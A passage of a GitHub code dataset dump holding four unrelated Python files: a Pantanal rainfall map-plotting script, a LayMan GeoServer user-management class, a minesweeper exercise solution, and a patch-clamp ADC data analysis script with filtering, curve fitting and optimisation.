name='admin-0-boundary-lines')\n    geo_reg = shpreader.Reader(geo_reg_shp)\n    geo_reg = geo_reg.records()\n    for rec in geo_reg:\n        ax.add_geometries( [rec.geometry], ccrs.PlateCarree(), edgecolor=\"r\", facecolor='none')#, linewidth = self.pantlw )\n    \"\"\"\n    # PANTANAL & UPRB\n    geo_reg_shp = shpreader.natural_earth(resolution='50m', category='physical',\n                                            name='geography_regions_polys')\n    geo_reg = shpreader.Reader(geo_reg_shp)\n    geo_reg = geo_reg.records()\n    #\n    # shapefile of the UPRB\n    UPRB_shp = \"/home/anthony/Documents/Doctorat/Tools/[DATA] HydroBASINS/UPRB.shp\"\n    UPRB = shpreader.Reader(UPRB_shp)\n    UPRB = UPRB.records()\n    #\n    for rec in geo_reg:\n        if 
(rec.attributes[\"name_es\"]==\"Pantanal\"):\n ax.add_geometries( [rec.geometry], ccrs.PlateCarree(), edgecolor=\"r\", facecolor='none')#, linewidth = self.pantlw )\n #\n for rec in UPRB:\n ax.add_geometries( [rec.geometry], ccrs.PlateCarree(), edgecolor=\"b\", facecolor='none')#, linewidth = self.pantlw )\n # \n for n in stnum:\n L = D[n]\n plt.plot(L[2],L[1], color = \"b\", marker = \"o\")\n\ndef plot_koho(ncol, nrow, ind, koho, title, namefig):\n plt.subplot(ncol, nrow, ind) \n plt.pcolor(clu.ml, clu.ml, np.flip(koho, axis = 0))\n plt.xticks(np.arange(1,6))\n plt.yticks(np.arange(1,6), np.flip(np.arange(1,6)))\n plt.colorbar()\n plt.title(title)\n\n\n\nstnum = list(D.keys())\nplot_locst(1, 1, 1, stnum) \nplt.savefig(dgraphs + \"stations.png\")\nplt.close()\n\n\n\n# Contour UPRB (smoothed) et contour Pantanal\n\nfor index, L in D.items():\n PM = dfrain['site']== index\n dfrain_PM = dfrain[PM]\n\n filtre = (dfrain_PM[\"value\"] > 2).to_numpy()\n rainy = np.full(filtre.shape, 1)\n rainy[filtre == False] = 0\n\n koho_PM = clu.koho_filter(rainy)\n \n plt.figure(figsize= (10,5))\n plot_koho(1, 2, 2, koho_PM, \"PM daily rainfall > 5mm\", \"3-\"+L[0]+\"_PRECIP.png\")\n plot_locst(1, 2, 1, [index])\n plt.savefig(dgraphs + \"3-\"+L[0]+\"_PRECIP.png\")\n plt.close()\n\n","repo_name":"VSCHY/SOMs_algo","sub_path":"Examples/Moisture_fluxes_Pantanal/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12359140720","text":"# Lincense: ...\n# authors: Michal, Jachym\n\nimport os, sys\n#import glob\nimport mimetypes, time\nimport json\nimport logging\nimport zipfile\nimport web\n\nfrom layman.errors import LaymanError\nfrom layman.layed.gsxml import GsXml\n\nclass UserPrefs:\n \"\"\"User preferences manager of LayMan\n \"\"\"\n\n config = None\n tempdir = None\n\n def __init__(self,config = None):\n \"\"\"constructor\n \"\"\"\n\n ## get configuration parser\n self._setConfig(config)\n\n def _setConfig(self,config):\n \"\"\"Get and set configuration files parser\n \"\"\"\n if config:\n self.config = config\n else:\n from layman import config\n self.config = config\n\n def createUser(self, userJsonStr):\n \"\"\" Create user and assign group membership\n userJsonStr: '{screenName: \"user\", roles: [{roleTitle, roleName}, {roleTitle, roleName}]}'\n return 409 Conflict if the user already exists\n \"\"\" \n logging.debug(\"[UserPrefs][createUser] %s\"% userJsonStr)\n \n userJson = json.loads(userJsonStr)\n user = userJson[\"screenName\"]\n grouplist = []\n for g in userJson[\"roles\"]:\n grouplist.append(g[\"roleName\"])\n\n gsx = GsXml(self.config)\n (code, message) = gsx.createUserWithGroups(user, grouplist)\n return (code, message)\n\n def updateUser(self, userJsonStr):\n \"\"\" Update user \n userJson: {screenName: \"user\", roles: [{roleTitle, roleName}, {roleTitle, roleName}]}\n if the user does not exist yet, create it.\n \"\"\" \n logging.debug(\"[UserPrefs][updateUser] %s\"% userJsonStr)\n\n userJson = json.loads(userJsonStr)\n user = userJson[\"screenName\"]\n grouplist = []\n for g in userJson[\"roles\"]:\n grouplist.append(g[\"roleName\"])\n\n gsx = GsXml(self.config)\n (code, message) = gsx.updateUserWithGroups(user, grouplist)\n return (code, message)\n\n def deleteUser(self, userName):\n \"\"\" Delete user\n \"\"\" \n logging.debug(\"[UserPrefs][deleteUser] %s\"% userName)\n\n gsx = GsXml(self.config)\n (code, message) = gsx.deleteUser(userName)\n return (code, 
message)\n\n","repo_name":"riskatlas/layman","sub_path":"server/layman/userprefs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17113158971","text":"def annotate(minefield):\n\n if minefield == []:\n return []\n\n if len(set(len(row) for row in minefield)) != 1:\n raise ValueError('Non-rectangular minefield!')\n\n if any(c not in ' *' for row in minefield for c in row):\n raise ValueError('Bad character!')\n\n mines = {\n (x, y)\n for y, row in enumerate(minefield)\n for x, char in enumerate(row)\n if char == '*'\n }\n\n return [\n ''.join(nbors(x, y, mines) if char == ' ' else '*'\n for x, char in enumerate(row))\n for y, row in enumerate(minefield)\n ]\n\n\ndef nbors(x, y, mines):\n\n coords = {\n (x - 1, y - 1), (x, y - 1), (x + 1, y - 1),\n (x - 1, y), (x + 1, y),\n (x - 1, y + 1), (x, y + 1), (x + 1, y + 1)\n }\n\n count = len(coords & mines)\n return str(count) if count else ' '\n","repo_name":"tomdml/exercism-solutions","sub_path":"minesweeper/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31715119114","text":"\"\"\"\nGeneral analysis of COVG ADC data (h5 files)\nLucas Koerner: koerner.lucas@stthomas.edu\n\n\"\"\"\nimport os\nimport sys\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport glob\nfrom scipy.signal import deconvolve, convolve, resample, decimate, resample_poly\nimport pandas as pd\nfrom filters.filter_tools import butter_lowpass_filter, delayseq_interp, butter_highpass_filter\nfrom analysis.adc_data import *\nfrom analysis.utils import find_nearest, find_closest_row, calc_fft\nfrom calibration.signal_chain import dn_per_nA\nfrom scipy.optimize import curve_fit, minimize, basinhopping\nfrom scipy.integrate import trapezoid\nfrom numpy.fft import fft, ifft, ifftshift\n\n# configure Matplotlib\nmatplotlib.use(\"Qt5agg\") # or \"Qt5agg\" depending on you version of Qt\nplt.ion()\n\n# setup data directory\ndata_dir_base = os.path.expanduser('~')\nif sys.platform == \"linux\" or sys.platform == \"linux2\":\n print('linux directory not yet configured')\nelif sys.platform == \"darwin\":\n data_dir_covg = \"/Users/koer2434/OneDrive - University of St. 
Thomas/UST/research/covg/fpga_and_measurements/daq_v2/data/clamp/{}{:02d}{:02d}\"\nelif sys.platform == \"win32\":\n data_dir_covg = os.path.join(data_dir_base, 'Documents/covg/data/{}{:02d}{:02d}')\n\ndata_dir = data_dir_covg.format(2022, 1, 16)\nFS = 5e6\nSAMPLE_PERIOD = 1/FS\nfig_dir = '/Users/koer2434/My Drive/UST/research/covg/manuscripts/biophysical_society_2022/figures'\n\n# TODO: fig_dir\n# TODO: summary tables\n# TODO: description of various data-sets\n# TODO: should the dir and file be set with the analysis type?\n# TODO: demonstrate RF adjustment -- label with nA\n# TODO: determine total integrated charge\n# TODO: search for optimal cc settings\n\n# analysis_type =['summary_stats', 'rf_swp']\n# analysis_type =['deconvolve']\n#analysis_type = ['im_noise']\n#analysis_type = ['im_vs_rf_plot']\n#analysis_type = ['rf_swp']\nanalysis_type = ['none']\n# analysis_type = ['check_impulse']\n\n# analysis examples\n\ndef adjust_step_delay(x, cc_step_func):\n cc_step_adj = delayseq_interp(cc_step_func, x[0], FS)\n return cc_step_adj\n\ndef adjust_step_scale(x, cc_step_func):\n cc_step_adj = cc_step_func*x[0]\n return cc_step_adj\n\n\n\ndef adjust_step(x, cc_step_func):\n \"\"\"\n a scale and a delay + 4 low-pass + 2 high pass + a runt\n \"\"\"\n\n cc_step_adj = delayseq_interp(cc_step_func*x[0], x[1], FS)\n\n for idx in range(6):\n j=idx*3\n if idx < 2:\n order = 1\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n if idx < 4:\n order = 2\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n else:\n order = 4\n cc_step_adj += delayseq_interp(butter_highpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n\n # add a runt: scale, width, location\n runt = np.zeros(len(cc_step_adj))\n runt[int(x[-2]):int(x[-1])] = x[-3] # initialize guess 0.1, location of step_func start, 6 us = 30 indices\n cc_step_adj += runt\n return cc_step_adj\n\ndef adjust_step2(x, cc_step_func):\n \"\"\"\n a scale and a delay + 2 low-pass + 1 high pass + a runt\n \"\"\"\n cc_step_adj = delayseq_interp(cc_step_func*x[0], x[1], FS)\n\n for idx in range(3):\n j=idx*3\n if idx < 1:\n order = 1\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n if idx < 2:\n order = 4\n cc_step_adj += delayseq_interp(butter_lowpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n else:\n order = 2\n cc_step_adj += delayseq_interp(butter_highpass_filter(cc_step_func, cutoff=x[j+3], fs=FS, order=order)*x[j+2], x[j+4], FS)\n\n # add a runt: scale, width, location\n runt = np.zeros(len(cc_step_adj))\n runt[int(x[-2]):int(x[-1])] = x[-3] # initialize guess 0.1, location of step_func start, 6 us = 30 indices\n cc_step_adj += runt\n\n return cc_step_adj\n\n\ndef adjust_step3(x, cc_step_func, PLT=False):\n \"\"\"\n processing of the CC signal that is appropriate for FPGA implementation\n a scale and a delay + 4-order low-pass\n (3 copies )\n \"\"\"\n if PLT:\n fig,ax=plt.subplots()\n\n cc_step_adj0 = delayseq_interp(cc_step_func*x[0], x[1], FS) # direct delay and scale that will then be filtered \n cc_step_adj1 = delayseq_interp(cc_step_func*x[2], x[3], FS) # delay that will then be filtered \n cc_step_adj2 = delayseq_interp(cc_step_func*x[4], x[5], FS) # delay and scale that will be added to the filtered results \n cc_step_adj3 = delayseq_interp(cc_step_func*x[6], x[7], FS) # 
delay and scale that will be added to the filtered results \n\n if PLT:\n ax.plot(cc_step_adj2, label='adj2')\n ax.plot(cc_step_adj1, label='1')\n\n order = 4\n cc_step_adj1 = butter_lowpass_filter(cc_step_adj1, cutoff=x[8], fs=FS, order=order)\n if PLT:\n ax.plot(cc_step_adj1, label='2')\n cc_step_adj2 = butter_lowpass_filter(cc_step_adj2, cutoff=x[9], fs=FS, order=order)\n\n cc_step_adj3 = butter_lowpass_filter(cc_step_adj3, cutoff=x[10], fs=FS, order=order)\n\n if PLT:\n ax.plot(cc_step_adj1, label='3')\n\n cc_step_adj = cc_step_adj1 + cc_step_adj2 + cc_step_adj3 + cc_step_adj0\n if PLT:\n ax.plot(cc_step_adj1, label='4')\n ax.legend()\n\n return cc_step_adj\n\nif 'im_noise_v0' in analysis_type:\n file_name = 'cc_swp_0.h5'\n t, adc = read_h5(data_dir_covg.format(2022, 1, 7), file_name, [0,1])\n ax = plot_adc(t, adc[0])\n filt_data = butter_lowpass_filter(adc[0], 1e6, 5e6, order=5)\n ax = plot_adc(t, filt_data)\n filt_data = butter_lowpass_filter(adc[0], 20e3, 5e6, order=5)\n plot_adc(t, filt_data)\n\nif 'im_movie' in analysis_type:\n import time\n for i in range(24):\n read_plot(data_dir, f'cc_swp_{i}.h5', filter_bw=[None])\n plt.show()\n plt.pause(0.01)\n time.sleep(2)\n plt.close('all')\n\nif 'summary_stats' in analysis_type:\n filename = 'cc_swp4'\n # load CSV summary as Pandas dataframe\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n # use 7e5 as lowest peak area without acquisition issue\n min_peakarea_ok = 7e5\n idx = output.peak_area > min_peakarea_ok\n\n # plot trace with minimum peak area\n min_pa = output[idx].peak_area.min()\n min_row = output[output.peak_area == min_pa]\n ax, t, adc_data = read_plot(data_dir, min_row.filename.item() + '.h5', chan_list=[0], filter_bw=None, ax=None, clr='b')\n ax.set_title('Minimum peak area')\n\n max_pa = output[idx].peak_area.max()\n max_row = output[output.peak_area == max_pa]\n ax, t, adc_data = read_plot(data_dir, max_row.filename.item() + '.h5', chan_list=[0], filter_bw=None, ax=None, clr='b')\n ax.set_title('Maximum peak area')\n\n\n\n def plot_one_vs(x_var='cc_scale', x_var_label='CC scaling', leg_var='cc_delay',\n other_var='cc_fc', y_var='peak_area'):\n # vary cc_scale at constant delay and fc\n # y-axis: peak_area\n # x-axis: cc_scale\n # legend: cc_delay\n # other: cc_fc at midpoint\n scaling = 4e-3\n\n idx = output['peak_area'] > min_peakarea_ok\n leg_var_unq = np.unique(output[leg_var])\n leg_var_unq_mid = leg_var_unq[len(leg_var_unq)//2]\n\n min_row = output[output.peak_area == min_pa]\n other_var_val = min_row[other_var].item()\n print(f'Found {other_var} value of {other_var_val} at minimum row')\n\n idx_other = idx & (output[other_var] == other_var_val)\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, len(leg_var_unq))))\n fig, ax = plt.subplots()\n for leg_var_val in leg_var_unq:\n idx_subset = idx_other & (output[leg_var] == leg_var_val)\n lbl = leg_var + ' = {:0.2g}'.format(leg_var_val)\n ax.plot(output[idx_subset][x_var], output[idx_subset][y_var]*scaling,\n marker='*', linestyle='None', color=next(colors), label=lbl) # uC\n\n ax.set_ylabel('Area of |Im| $\\mu$C')\n ax.set_xlabel(f'{x_var_label}')\n ax.legend()\n plt.savefig(os.path.join(data_dir, f'fig_{y_var}_vs_{x_var}'))\n\n plot_one_vs(x_var='cc_delay', x_var_label='CC delay', leg_var='cc_fc',\n other_var='cc_scale', y_var='peak_area')\n\n\nif 'trace_comparison' in analysis_type:\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, np.sum(idx))))\n fn = output[idx].filename\n cc_scale = 
output[idx].cc_scale\n ax, t, adc_data = read_plot(data_dir, fn.iloc[0] + '.h5', chan_list=[0], filter_bw=None, ax=None, clr=next(colors), lbl='cc = {:.2f}'.format(cc_scale.iloc[0]))\n for f, cc_s in zip(fn[1:], cc_scale[1:]):\n ax, t, adc_data = read_plot(data_dir, f + '.h5', chan_list=[0], filter_bw=None, ax=ax, clr=next(colors), lbl='cc = {:.2f}'.format(cc_s),\n scaling = 4)\n ax.legend()\n ax.set_xlim([1400, 3000])\n plt.savefig(os.path.join(data_dir, 'fig_vary_ccscale'))\n\n # vary delay at constant fc and scale\n idx = output.peak_area > 7e5\n cc_scale = np.unique(output.cc_scale)\n cc_scale_mid = cc_scale[3]\n # ('cc_scale', min_row.cc_scale.item())\n for col in [('cc_scale', cc_scale_mid), ('cc_fc', min_row.cc_fc.item())]:\n idx = idx & (output[col[0]] == col[1])\n\n fig, ax = plt.subplots()\n ax.plot(output[idx].cc_delay, output[idx].peak_area*4e-3, marker='*') # uC\n ax.set_ylabel('Area of |Im| $\\mu$C')\n ax.set_xlabel('CC delay')\n plt.savefig(os.path.join(data_dir, 'fig_area_vs_ccdelay'))\n\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, np.sum(idx))))\n fn = output[idx].filename\n cc_delay = output[idx].cc_delay\n ax, t, adc_data = read_plot(data_dir, fn.iloc[0] + '.h5', chan_list=[0], filter_bw=None, ax=None, clr=next(colors), lbl='cc = {:.2f}'.format(cc_delay.iloc[0]))\n for f, cc_s in zip(fn[1:], cc_delay[1:]):\n ax, t, adc_data = read_plot(data_dir, f + '.h5', chan_list=[0], filter_bw=None, ax=ax, clr=next(colors), lbl='delay = {:.2f}'.format(cc_s*1e6),\n scaling = 4)\n ax.legend()\n ax.set_xlim([1400, 3000])\n plt.savefig(os.path.join(data_dir, 'fig_vary_ccdelay'))\n\n\nif 'im_vs_rf_plot' in analysis_type:\n data_dir = data_dir_covg.format(2022, 1, 16)\n filename = 'rf_swp3'\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n tmin = 3175\n for cc_scale in [0, -0.33]:\n fig, ax = plt.subplots()\n colors = iter(plt.cm.rainbow(np.linspace(0, 1, len(np.unique(output.rf))-1)))\n for index, r in output.iterrows():\n t, adc_data = read_h5(data_dir, r.filename + '.h5', [0,1])\n if r.rf < 1000:\n ccomp = 47\n else:\n ccomp = 4747\n if ((r.cc_scale == cc_scale) and (r.ccomp == ccomp) and (r.rf < 4000)):\n lbl = '{:0.2f} DN/nA ($R_F$={} k$\\Omega$)'.format(dn_per_nA(r.rf*1e3), int(r.rf))\n ax.plot(t*1e6 - tmin, adc_data[0], label=lbl, color=next(colors))\n print(f'RF = {r.rf}, filename = {r.filename}, cc_scale = {r.cc_scale}')\n ax.set_xlabel('t [$\\mu$s]')\n ax.set_ylabel('$I_m$ [DN]')\n ax.set_xlim([0, 0 + 150])\n ax.set_ylim([-200, 2**15])\n ax.legend()\n if cc_scale == 0:\n plt.savefig(os.path.join(fig_dir, 'im_vs_rf_plot_noCC.png'))\n else:\n plt.savefig(os.path.join(fig_dir, 'im_vs_rf_plot_CC.png'))\n\nif 'rf_swp' in analysis_type:\n data_dir = data_dir_covg.format(2022, 1, 16)\n filename = 'rf_swp3'\n csv_summary = glob.glob(os.path.join(data_dir, f'{filename}_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n h5_files = glob.glob(os.path.join(data_dir, f'{filename}_*.h5'))\n pa_arr = np.array([])\n for hf in h5_files:\n ax, t, adc_data = read_plot(data_dir, hf.split('/')[-1], chan_list=[0])\n plt.pause(1)\n plt.close('all')\n pa, num_found = peak_area(t, adc_data[0])\n pa_arr = np.append(pa_arr, pa)\n\n # alternatively, use the dataframe to find the files to plot\n for ccomp in [47, 4747]:\n for cc_scale in [0, -0.33]:\n fig, ax = plt.subplots()\n if ccomp < 1000:\n rf_test = 3000\n idx = (output.ccomp == ccomp) & (output.cc_scale == cc_scale) & (output.rf < rf_test)\n else:\n rf_test = 100000 # all rfs\n idx = 
(output.ccomp == ccomp) & (output.cc_scale == cc_scale) & (output.rf < rf_test)\n clrs = iter(plt.cm.rainbow(np.linspace(0, 1, np.sum(idx))))\n for idx, r in output.iterrows():\n t, adc_data = read_h5(data_dir, r.filename + '.h5', chan_list=[0])\n if (r.ccomp == ccomp) and (r.cc_scale == cc_scale) and (r.rf < rf_test):\n ax, t, adc_data = read_plot(data_dir, r.filename + '.h5', chan_list=[0],\n ax=ax, clr=next(clrs))\n\n DEBUG_FIT_PLOT = False\n im_df = pd.DataFrame()\n im_data = {}\n noise_time = [2500e-6, 2900e-6]\n peak_time = [3200e-6, 3400e-6]\n for idx, r in output.iterrows():\n t, adc_data = read_h5(data_dir, r.filename + '.h5', chan_list=[0])\n t=t[64:]\n adc_data[0]=adc_data[0][64:]\n # calculate peak rise-time, peak fall-time (time-constant), integrated charge, noise [full BW and 3 kHz], undershoot\n im_data['rf'] = r.rf\n im_data['ccomp'] = r.ccomp\n im_data['cc_scale'] = r.cc_scale\n idx_noise = idx_timerange(t, noise_time[0], noise_time[1])\n im_data['noise_nofilt'] = np.std(adc_data[0][idx_noise]/dn_per_nA(r.rf*1e3))\n im_data['noise_3k_filt'] = np.std(butter_lowpass_filter(adc_data[0][idx_noise]/dn_per_nA(r.rf*1e3), cutoff=3e3, fs=FS, order=5))\n im_data['filename'] = r.filename\n\n y = adc_data[0]\n t_peaks, idx_pk, results = find_peak(t, y, th=5, distance=10000)\n print(t_peaks)\n t_nearest = find_nearest(t_peaks, peak_time[0])\n idx_decay = idx_timerange(t, t_nearest, t_nearest+120e-6)\n y = adc_data[0][idx_decay]/dn_per_nA(r.rf*1e3)\n # idx_decay = idx_timerange(t, peak_time[0], peak_time[1])\n # tau, amp = np.polyfit(t[idx_decay], np.log(y), 1, w=np.sqrt(y))\n exp_fits, err = curve_fit(lambda t,a,tau: a*np.exp(-t/tau),\n t[idx_decay]-t[idx_decay][0], y,\n p0=[10000, 1e3*33e-9])\n im_data['tau'] = exp_fits[1]\n im_data['amp'] = exp_fits[0]\n im_data['peak_time'] = t_nearest\n # integrate around the peak for total charge\n idx_integrate = idx_timerange(t, t_nearest-120e-6, t_nearest+300e-6)\n y = adc_data[0][idx_integrate]/dn_per_nA(r.rf*1e3)\n im_data['integrated_charge_nC'] = trapezoid(y, t[idx_integrate])\n\n if DEBUG_FIT_PLOT:\n fig, ax = plt.subplots()\n ax.plot(t[idx_decay]-t[idx_decay][0], y, color='b')\n ax.plot(t[idx_decay]-t[idx_decay][0], exp_fits[0]*np.exp( -(t[idx_decay]-t[idx_decay][0])/exp_fits[1]), color='r')\n print(im_data)\n input()\n plt.close('all')\n\n im_df = im_df.append(im_data, ignore_index=True)\n\nif 'deconvolve' in analysis_type:\n\n def wiener_deconvolution(signal, kernel, lambd=1e-3):\n \"\"\"Applies Wiener deconvolution to find true observation from signal and filter\n\n The function can be also used to estimate filter from true signal and observation\n \"\"\"\n # zero pad the kernel to same length\n kernel = np.hstack((kernel, np.zeros(len(signal) - len(kernel))))\n H = fft(kernel)\n deconvolved = np.real(ifft(fft(signal)*np.conj(H)/(H*np.conj(H) + lambd**2)))\n return deconvolved\n\n data_dir = data_dir_covg.format(2022, 1, 19)\n filename = 'step_swp_{}'\n t_offset_idx = 64\n t_offset = 64*200e-9\n csv_summary = glob.glob(os.path.join(data_dir, f'*_*.csv'))[0]\n output = pd.read_csv(csv_summary)\n\n # try with 20 and 21 which is Rf = 100 k and Ccomp = 47 pF\n # TODO: do I need to consider the difference in values between CC and CMD?\n for nums in ([20,21], [30,31], [14,15], [40,41]):\n\n def get_impulse(num):\n \"\"\" get the impulse of an Im trace by calculating the derivative\n \"\"\"\n t, adc_data = read_h5(data_dir, filename.format(num) + '.h5', chan_list=[0])\n t=t[t_offset_idx:]\n adc_data[0]=adc_data[0][t_offset_idx:]\n\n # make 
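Editor's note: the curve_fit exponential-decay fit above (p0 = [10000, 33e-6]) can be sanity-checked on synthetic data. A self-contained version of the same pattern; the amplitude, tau, and noise level are made up to mirror the initial guess:

import numpy as np
from scipy.optimize import curve_fit

rng = np.random.default_rng(0)
t = np.linspace(0, 200e-6, 500)
y = 1e4 * np.exp(-t / 33e-6) + rng.normal(0, 10, t.size)  # tau = 33 us decay

fits, _ = curve_fit(lambda t, a, tau: a * np.exp(-t / tau), t, y,
                    p0=[1e4, 30e-6])
print(fits)  # recovers roughly [1e4, 33e-6]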
step function at t0\n t0 = 3200e-6*2\n idx_signal = idx_timerange(t, t0-150e-6, t0 + 200e-6)\n y = adc_data[0][idx_signal]\n while y[0]==0:\n y = y[1:] # deconvolution fails if the first element is zero\n\n # step function is not necessary but could be used for plotting convolution\n idx_step = idx_timerange(t, t0-350e-6, t0 + 400e-6)\n t_conv = t[idx_step]\n step_func = np.ones(len(t_conv)) # can't have 0s in the filter function\n step_func[t_conv < t0] = 0\n step_func_fullbw = step_func\n step_func = butter_lowpass_filter(step_func, cutoff=1e6, fs=FS, order=5)\n # The length of the deconvolution output is: len(signal) - len(filter) + 1\n # imp_resp, remainder = deconvolve(step_func, y)\n y = butter_lowpass_filter(y, cutoff=1e6, fs=FS, order=5)\n\n # the Wiener deconvolution adds noise to the denominator so that the result doesn't explode.\n # imp_resp_w = wiener_deconvolution(y, step_func)[:(len(y)-len(step_func) + 1)]\n # imp_resp_w = wiener_deconvolution(y, step_func)[:(248)]\n\n # An FFT-based deconvolution of a step response is fraught since the step response has a\n # low information FFT. Large at f=0 and then constant at all other frequencies.\n # seems better to simply take the derivative ... this gives the impulse response\n imp_resp_d = np.gradient(y, t[1]-t[0])\n return imp_resp_d, step_func, step_func_fullbw\n\n alpha_cmd, step_func, step_func_fullbw = get_impulse(nums[0])\n beta_cc, _, _ = get_impulse(nums[1])\n\n def im_conv(x, cc_step_func):\n \"\"\" convolve the impulse function with a step function after adjusting the step function\n that is applied to the cc impulse function\n return the sum of the absolute value of the current\n \"\"\"\n cc_step_adj = adjust_step2(x, cc_step_func)\n return np.sum(np.abs(np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, cc_step_adj, mode='valid')))\n\n fig, ax = plt.subplots()\n ax.plot(np.convolve(alpha_cmd, step_func, mode='valid') + np.convolve(beta_cc, step_func, mode='valid'))\n\n fig, ax = plt.subplots()\n ax.plot(alpha_cmd, 'b', label='cmd')\n ax.plot(beta_cc, 'r', label='cc')\n fig.suptitle('Impulse response of cmd,cc')\n\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd, step_func, mode='valid') + np.convolve(beta_cc, step_func, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t,y)\n fig.suptitle('Conv of step with CMD and CC impulse')\n\n # this minimize method works reasonably well but suspect it needs to use something like a\n # basin-hopping method since it doesn't use all of the knobs it is given (finds a local minimum??)\n # im_conv([0,100e3,0,100e3,0,1.3], step_func)\n # deconvolution is messy -- optimize the step_func that is convolved with beta_cc\n OPTIMIZE = False\n HOP = False\n\n if OPTIMIZE:\n runt_idx = np.argmax(step_func_fullbw>0.5)\n # bnds = ((-2, 2), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n # (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n # (-0.3, 0.3), (runt_idx-50, runt_idx+50), (runt_idx-20, runt_idx+80))\n # out_min = minimize(im_conv, x0=[0.5,0,\n # 0.5, 100e3, 10e-6,\n # 0.5,100e3, 0e-6,\n # 0.5, 100e3, -10e-6,\n # 0.5,100e3, 0e-6,\n # 0.02, 200e3, -10e-6,\n # 0.02, 200e3, 10e-6,\n # 0.1, runt_idx, runt_idx+30],\n # args=(step_func_fullbw), bounds=bnds, method='L-BFGS-B')\n\n bnds = ((-2, 2), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 
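Editor's note: the comment above argues that differentiating a step response is more robust than FFT deconvolution for extracting the impulse response. A toy check of that identity on a first-order system, using the record's 5 MHz sample rate:

import numpy as np

FS = 5e6
t = np.arange(0, 200e-6, 1 / FS)
tau = 10e-6
step_resp = 1 - np.exp(-t / tau)                 # step response
imp_est = np.gradient(step_resp, t[1] - t[0])    # derivative, as in get_impulse
imp_true = np.exp(-t / tau) / tau                # analytic impulse response
# Interior points agree to a few parts in 1e5; the endpoints are one-sided.
print(np.abs(imp_est - imp_true)[2:-2].max() / imp_true.max())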
30e-6),\n (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-0.3, 0.3), (runt_idx-50, runt_idx+50), (runt_idx-20, runt_idx+80))\n out_min = minimize(im_conv, x0=[0.5,0,\n 0.5, 100e3, 10e-6,\n 0.5,100e3, 0e-6,\n 0.5, 100e3, -10e-6,\n 0.1, runt_idx, runt_idx+30],\n args=(step_func_fullbw), bounds=bnds, method='L-BFGS-B')\n\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, step_func_fullbw, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t*1e6, y, 'b')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, adjust_step(out_min['x'], step_func_fullbw), mode='valid'), 'r')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid'), 'k')\n\n fig, ax = plt.subplots()\n y = adjust_step(out_min['x'], step_func_fullbw)\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t,y)\n\n if HOP:\n runt_idx = np.argmax(step_func_fullbw>0.5)\n bnds = ((-2, 2), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6),(-30e-6, 30e-6),\n (-2, 2), (200, 2.45e6), (-30e-6, 30e-6),\n (-0.3, 0.3), (runt_idx-50, runt_idx+50), (runt_idx-20, runt_idx+80))\n\n minimizer_kwargs = { \"method\": \"L-BFGS-B\",\"bounds\":bnds,\"args\":(step_func_fullbw) }\n out_hop = basinhopping(im_conv, x0=[0.5,0,\n 0.5, 100e3, 10e-6,\n 0.5, 100e3, 0e-6,\n 0.5, 100e3, -10e-6,\n 0.1, runt_idx, runt_idx+30],\n minimizer_kwargs = minimizer_kwargs)\n\n fig, ax = plt.subplots()\n y = adjust_step(out_hop['x'], step_func_fullbw)\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t,y)\n\n fig, ax = plt.subplots()\n y = np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + np.convolve(beta_cc, step_func_fullbw, mode='valid')\n t = np.linspace(0, (len(y) - 1)*SAMPLE_PERIOD, len(y))\n ax.plot(t*1e6, y, 'b', label='CMD + CC step')\n ax.plot(t*1e6, np.convolve(alpha_cmd, step_func_fullbw, mode='valid') + \\\n np.convolve(beta_cc, 